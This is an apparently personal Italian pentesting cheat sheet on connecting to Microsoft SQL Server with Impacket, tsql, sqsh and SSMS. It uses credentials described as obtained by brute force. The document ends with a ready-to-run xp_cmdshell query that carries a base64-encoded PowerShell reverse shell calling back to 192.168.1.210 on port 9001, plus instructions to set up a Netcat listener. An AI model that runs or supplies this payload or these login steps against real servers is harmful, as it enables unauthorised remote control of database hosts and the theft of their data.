tags: Connessione_MSSQL Linux Windows MSSQL database
Linux
Impacket
python3 /root/impacket/examples/mssqlclient.py CEH.com/<username>:<password>@10.10.1.30 -port 1433TSQL
sudo apt update
sudo apt install freetds-bin freetds-common
tsql -H IP_o_Hostname -p 1433 -U username -P password
#esempio
tsql -H 192.168.1.10 -p 1433 -U admin -P Password123!SQSH
sudo apt update
sudo apt install sqsh
sqsh -S <IP_SERVER>[:<PORTA>] -U <USERNAME> -P '<PASSWORD>'
sqsh -S 10.10.0.5:1433 -U sa -P 'P@$$wOrd123!'Windows
MSSM
Microsoft SQL Server Management è uno strumento con interfaccia grafica che ci permette di connetterci ad un server Microsoft SQL, lo possiamo scaricare dal sito ufficiale e una volta installato e avviato possiamo connetterci mettendo:
| Campo | Cosa mettere |
|---|---|
| Server name | L’indirizzo IP del server MSSQL (es. 192.168.1.10) |
| Authentication | SQL Server Authentication |
| Login | Il nome utente trovato (es. sa) |
| Password | La password trovata tramite brute-force |
Ricordati anche di cliccare sulla flag Trust server certificate in fondo alla pagina.
Reverse Shell
Tramite MSSM possiamo generare delle query che ci permetto di ottenere una reverse shell, per farlo possiamo cliccare con il tasto destro sull’iconcina del database e cliccare su New Query. Una volta aperta la sezione query possiamo provare tramite il comando xp_cmdshell a generare una reverse shell come nel seguente esempio:
Per prima cosa ci generiamo una reverse shell powershell (quella base64 è la migliore) tramite https://www.revshells.com/ poi ci mettiamo in ascolto tramite Netcat (puoi anche utilizzare Linux) alla porta stabilita e ci connettiamo tramite la seguente query da lanciare con MSSM:
EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAyADEAMAAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=';